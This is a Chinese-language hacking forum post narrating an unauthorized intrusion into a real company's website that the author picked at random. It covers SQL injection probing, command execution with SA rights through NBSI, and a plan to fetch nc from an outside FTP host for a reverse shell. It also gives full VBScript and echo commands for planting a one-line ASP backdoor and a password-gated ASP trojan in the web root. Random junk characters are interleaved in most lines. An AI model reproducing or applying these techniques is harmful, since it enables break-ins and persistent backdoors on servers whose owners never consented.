|
作者:haicao [E.S.T]+ k9 R: |/ @& N$ @/ z
, R4 m/ v; g" B) a3 a. {6 `
今天在网上看到一个动画,动画里说那些大公司的安全做的怎么怎么差,所以我便决定找个看看,在GOOGLE随便输入了"集团",搜索到的第一页随便点击就进了一家公司的网站。随便点了一个连接加了一个单引号: r9 G3 q4 Q1 z6 v
http://www.xxx.com.cn/gushi.asp?pid=8&cid=111'
& c) i' b: a& z- X! Z5 n2 e晕,返回错误:1 I) ]# I6 B& `( F! @6 x% G
Microsoft VBScript 编译器错误 错误 '800a03f6'
5 T# f0 [3 k( y T" u6 H1 J# @; q l0 W6 c) N# j
缺少 'End' # m8 {' C8 ^. g l# R! b1 E7 X
. r& T: O) q* i4 v
/iisHelp/common/500-100.asp,行242 * ?9 _7 A% a$ N% ]
' `4 r% a' h5 ~" eMicrosoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
( b) M+ H, t7 ~; W p) }, j8 [6 R1 s0 f3 P5 p( Q
[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 '' 之前有未闭合的引号。
X0 i! _" u9 t( c4 B. {
3 K/ N, T! k: v$ u/inc/artid.inc,行8 9 c3 I* Z8 o7 I9 j" G# L0 }
返回的信息说明是SQL Server
% S- [% h- @$ @ I4 D; j$ v |4 ~7 [ping www.xxx.com.cn后返回IP:61.XX.XX.68通过IP可以直接访问这个网站,说明是独立的服务器。
6 G, W, C, R; V. { D我一下来了兴致看来是家有钱的大公司,用NBSI检测了下这个连接,竟然是SA权限的!/ d% G! I/ Y' X, z* T+ f
, @6 X) H2 w" j2 X& H" a# [6 h 0 M, d3 y, Y) j3 g
我用SUPERSCAN扫描了这台主机的开放端口只开放了80及8080端口(都是提供web服务,看来是装了_blank">防火墙,意料之中)。这样的话直接添加用户开3389什么都失去了意义了。只好重新理清头绪。
$ ~8 L0 X- {9 b# |2 l) ?8 Z+ Z首先想到的是用ECHO写一个ftp.txt文件然后执行ftp -s:ftp.txt来下载一个nc在NBSI里执行命令反向连接过来就可以得到它的系统权限了,但在用ECHO写文件时又出了问题了,我输入一条ECHO命令竟然执行了四次。如图我输入命令 echo open ftp.eviloctal.com>>e:\xxxweb\app\3.txt(e:\xxxweb为网站根目录)竟然往文件里写入了四次这样的话直接用ftp.txt下载文件肯定没戏。( [4 R% r, C! ^* L0 i* |
* h& C2 S; _2 q) @# P2 G
$ S0 v8 ?) r( N/ s ; q4 Q+ c! Y& q: ~
(特别提示:用NBSI执行命令的时侯最好不要勾选尝试返回结果,因为执行命令会很慢很慢,而用重定向符">>"把命令的执行结果重定向输出到web目录比如dir c:\可以写成dir c:\ >> e:\xxxweb\app\1.txt这样速度很快然后通过浏览器查看命令执行结果浏览http://www.xxx.com.cn/app/1.txt e:\xxxweb为网站的根目录)8 d* D1 Y \4 a5 R& R! u
2 S4 g& {5 s- r8 g$ I, N如果能把那个一句话的后门(服务端:)写到WEB目录就好办了,但是不管怎么ECHO %也被过滤掉了。在本地执行echo ^的文件,但在NBSI里执行时无论如何生成的文件中%被过滤了。内容变成:6 @# h+ j& E* ^9 Q. W" E! E
) K; Z. ^! ]% z+ z4 H <execute request("l")> 0 W+ e, B. N* K7 e
<execute request("l")> " G2 h/ d$ M+ ]" @# }5 [2 W9 V
<execute request("l")> : c% t2 v+ v# N Q* G6 N8 v7 x
<execute request("l")>
, \9 b: _( t+ X
. ^, l) K) J! t% d; _) y* F3 \5 u, a4 [! T% `
这样的话,就没办法直接写一句话的ASP服务端后门了。(内容为四句原因同上)我想到了先写一个VBS脚本然后把要写的文件内容作为参数传递给VBS脚本去处理生成相应的文件。
& b* C6 [$ U; i2 Y* Z- X写文件的脚本writefile.vbs(命令格式为cscript writefile.vbs "要写的字串" 目标文件)内容为:5 }* t: {$ {. o- m% A
on error resume next:x=1:
) a% z+ J' T; D( F# N* A; ^str=replace(Wscript.Arguments(0),"==",vbcrlf): '将==替换回车
& D' i" }, n% Q2 Vstr=replace(str,"**",""""): ‘将**替换为符号". F0 H3 D1 ~3 U& v7 g0 J& ]: J R
str=replace(str,"--",chr(38)): ‘将--替换为符号 &! O$ G9 }$ e+ D7 ]3 o
str=replace(str,"@@",chr(37)): '将@@替换符号%, W. ?" V# J1 A4 v3 U8 n+ b
Set fso = CreateObject("Scripting.FileSystemObject"): 0 t1 k/ ~3 | B2 ]1 |" I4 f
Set a = fso.CreateTextFile(Wscript.Arguments(1),true): ‘创建文件,文件名为执行时给出的第二个参数/ s' V) Z# I$ O9 L& Y p3 @, @* Z J
if x=1 then a.Write(str):x=2:set fso=nothing:set a=nothing end if:
4 Z r4 K* H; J# l9 c* H这个文件得用ECHO命令把它写到服务器上xxx.vbe或xxx.vbs,然后用这个VBS写我们要的文件。(上面中因为像",%,&,回车符 是不能直接作为参数传递给脚本文件的,所以还需要对这些字符进行替换。下面的脚本trans.vbs将完成相反的过程): @ D5 S0 c( i1 g+ h" U0 i
简单解释一下:第一条语句是最重要的,容错语句不管后面的程序出了什么错都继续执行。其次是IF语句,为了避免多条语句重复向文件写入同样的内容用了一个标志若x=1才执行写文件,写完马上把x赋值为2。其次可能你会感到奇怪为什么每条语句后加了:,其实是因为我考虑到如果在同一行有多条相同的语句的时侯可以保证程序还能执行。比如:( b3 _% d7 Q/ [* G K/ t
str=replace(Wscript.Arguments(0),"==",vbcrlf):str=replace(Wscript.Arguments(0),"==",vbcrlf):. S/ k( h }% T# h* E4 w: Q$ f
若写成str=replace(Wscript.Arguments(0),"==",vbcrlf)* c; `: d9 [& J) U0 q- h
则一行显示多条相同语句时变成
e3 ^# q4 V+ u4 B. o& astr=replace(Wscript.Arguments(0),"==",vbcrlf)str=replace(Wscript.Arguments(0),"==",vbcrlf)2 p( D9 ?1 r" Q6 a7 Z
这样程序便不能正常执行了。
0 Z5 |# }( E/ r% |' q/ M2 u",%,&,回车符 是不能直接作为参数传递给脚本文件,容易看出用==代替了回车,用**代替了双引号,用--代替了&,用@@代替了%.在执行写文件得先把我们要写的文件比如转换成writefile.vbs可以接受的格式。用下面的脚本转换trans.vbs(命令格式为cscript trans.vbs 源文件 目标文件):" ]1 O& X+ @2 a( \
on error resume next
! c$ M6 t1 m7 Qif Wscript.Arguments.count<>2 then
5 Z# F v8 c2 ~$ w) t wscript.echo "参数有误啦 格式为:cscript trans.vbs 源文件 目标文件"7 `* \ u$ g, ^' V
wscript.quit
% o1 A9 q- W$ y, d& yend if/ R! b1 g* n1 G4 V! h5 G
Set fso=CreateObject("Scripting.FileSystemObject")
9 I8 J5 J1 T p! _Set a=fso.openTextFile(Wscript.Arguments(0))1 x9 w3 i7 v" ~* f4 f& j
str=a.readall
* H( D% z1 ]2 H2 estr=replace(str,"""","**") '把双引号替换成**8 L# {% ?6 w4 m# `: r, ]( S
str=replace(str,vbcrlf,"==") '把回车替换成==
$ n3 G8 Z( w: x1 s) Tstr=replace(str,"&","--") '把&号替换成--
$ g+ r- K2 ~: ystr=replace(str,"%","@@") '把%替换成@@
+ G. m1 H: |& ~! x! _wscript.echo str, t7 B6 Y. h: V
Set a=fso.CreateTextFile(Wscript.Arguments(1), True)
! Q, X/ V/ k, H( o/ ra.Write(str)! W! ^# v; M) Q1 B
, j& j7 T$ v3 i6 n1 a5 P
在本地执行cscript trans.vbs one.txt onetrans.txt
9 f' W8 F, D0 s- I5 q" s% W f其中one.txt为我们的一句话后门内容为:
7 Z: {6 S: I2 Q+ e转换后内容存在onetrans.txt中内容变成转换后的:<@@execute request(**l**)@@>保存在文件onetrans.txt中。
0 i) r& g8 l1 J( T) |7 `& Hwritefile.vbs的ECHO代码为:
8 ~% `( g L/ t/ w4 Necho on error resume next:x=1:>>writefile.vbe
: C2 `5 A/ J- q. V x5 fecho str=replace(Wscript.Arguments(0),"==",vbcrlf):>>writefile.vbe 7 K# E) d. r. _$ n' s
echo str=replace(str,"**",""""):>>writefile.vbe
$ ~. v) {- \$ h% F' \+ ?echo str=replace(str,"--",chr(38)):>>writefile.vbe
3 ^9 e+ U) h4 j/ \( g* z& jecho str=replace(str,"@@",chr(37)):>>writefile.vbe
/ \/ y& U. A5 z" _' p4 wecho Set fso = CreateObject("Scripting.FileSystemObject"):>>writefile.vbe. H$ n0 w p, ~( x
echo Set a = fso.CreateTextFile(Wscript.Arguments(1),true):>>writefile.vbe5 O! q" G7 z X" _5 J$ o
echo if x=1 then a.Write(str):x=2:set fso=nothing:set a=nothing end if:>>writefile.vbe4 h! j6 T9 N7 _7 O
1 @/ \/ M' M/ \. \+ R6 c6 h3 H
把上面的命令一句句拿到NBSI的NB Commander 命令执行器上执行一下就在对方的系统目录下写进了一个文件writefile.vbe,接着就可以把一句话的服务器的后门写到对方WEB目录下了!命令为:
+ r. u( T" P% `* v7 d+ v* Lcscript writefile.vbe "<@@execute request(**l**)@@>" d:\web\app\1.asp (注意当传递给脚本的参数中含空格时一定得用两个双引号括起来!)
; R3 L' |( f! B( o相应的地址为:http://www.xxx.com.cn/app/1.asp6 S& `7 R! I6 K O* @, D4 M
把post.htm的form action指向这个地址我们就可以在本地把我们的木马上传到服务器上了!如图: c0 f- }8 z0 y; W0 W* |. r
( g* X/ i. N* |2 n5 p* x
4 {: v$ u% z7 j2 @7 H7 c- g _
执行post.htm在下面的文本框中粘贴一下我们用来保存文件的ASP木马。并点击upload当成功转向EST论坛时说明ASP木马上传成功了!
7 w2 i% {( H4 Z A" w6 f: f- A9 @/ `+ ?2 P
我很顺利的把保存文件的木马上传到了服务器上文件名为advv.asp.如图:, F! k7 i7 T6 p: q# y5 N1 h
K: `! k+ F4 s& D+ G$ ?
我把这个木马加了验证所以必须得通过这个url才能顺利访问:1 \+ f2 U) `% x: {
http://www.xxx.com.cn/app/advv.asp?id=haicao (当未加参数id=haicao时显示空页面) |